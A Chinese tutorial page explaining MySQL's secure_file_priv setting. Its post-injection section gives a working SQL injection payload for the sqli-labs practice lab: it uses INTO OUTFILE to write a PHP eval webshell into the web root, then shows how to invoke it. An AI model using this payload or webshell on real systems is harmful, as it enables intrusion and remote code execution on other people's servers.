Mysql 中的secure_file_priv参数设置方法
secure_file_priv是MySQL中的系统变量,用于限制文件的读取和写入。
该参数的设置可以通过my.ini(windows版本)/my.cnf(Linux版本)中设置。
修改完参数之后,必须重启数据库才能生效。
启动MySQL,先查看secure_file_priv的值。
命令:show variables like "secure%" 或 select @@secure_file_priv;
1.secure_file_priv = NULL ,限制文件的读取和写入。
2.secure_file_priv = 文件路径 ,限制文件的读取和写入只能在设定的文件夹中。
3.secure_file_priv= "", 对文件和读取和写入没有任何限制。
【MySQL漏洞注入后期】
1. select *** into dumpfile 文件路径;
内容在文件中是以一行的形式呈现,多行数据会出现数据保存不全;
dumpfile只能写一行,并且输出中不存在任何格式。
2.select *** into outfile 文件路径;
内容有特殊格式转换,该换行换行,较比dumpfile更加好用;
outfile可以写入多行数据,并且字段和行终止符都可以作为格式输出。
例如:?id=1')) union select 1,"<?php eval($_REQUEST[123]) ?>",3 into outfile "C://phpStudy//WWW//sqli-labs-master//Less-7//test.php" -- +
调用:url/test.php?123=phpinfo();
3.select *** load_file (下载文件)
select load_file(文件路径);
到此这篇关于Mysql 中的secure_file_priv参数设置的文章就介绍到这了,更多相关mysql secure_file_priv参数设置内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!
相关文章
这篇文章主要介绍了MySQL的备份工具mysqldump的基础使用命令总结,除了基本的导入导出,还介绍了其他一些命令参数的用法,需要的朋友可以参考下2015-12-12
这篇文章主要给大家介绍了关于MySQL学习记录之KEY分区引发的血案的相关资料,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧2020-11-11
这篇文章主要介绍了MySQL架构设计思想详解,文章围绕主题展开详细的内容介绍,具有一定的参考价值,需要的朋友可以参考一下2022-08-08
大多数情况下,mysql数据库只要本机访问就可以了,这样的话,默认安装就OK,但是如果需要外网访问mysql数据库的话,应该如何操作呢,想知道的话,就好好看看下面的介绍吧2014-08-08
mysql正则表达式(regexp和rlike)的搜索功能实例分析
这篇文章主要介绍了mysql正则表达式(regexp和rlike)的搜索功能,结合实例形式分析了mysql正则表达式使用regexp和rlike的搜索功能相关原理与实现技巧,需要的朋友可以参考下2019-12-12
我们在操作数据的时候,有时候需要把多行数据,拼接成一行,下面这篇文章主要给大家介绍了关于MySQL将多条数据合并成一条的完整代码示例,文中通过图文介绍的非常详细,需要的朋友可以参考下2024-05-05
数据库的一个难题是无法将SQL语句的执行结果转换为想要的格式。本节,我们将通过学习格式转换中具有代表性的行列转换和嵌套式侧栏的生成方法,深入理解一下其中有重要作用的外连接2022-04-04
浅谈mysql中concat函数,mysql在字段前/后增加字符串
下面小编就为大家带来一篇浅谈mysql中concat函数,mysql在字段前/后增加字符串。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧2017-02-02
网上关于Linux安装mysql数据库的教程数不胜数,但是,大多教程都是漏洞百出。今天,为了帮助各位需要的人,从而写下Centos7安装配置mysql5.7的教程。2018-02-02
解说mysql之binlog日志以及利用binlog日志恢复数据的方法
下面小编就为大家带来一篇解说mysql之binlog日志以及利用binlog日志恢复数据的方法。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧2017-03-03
最新评论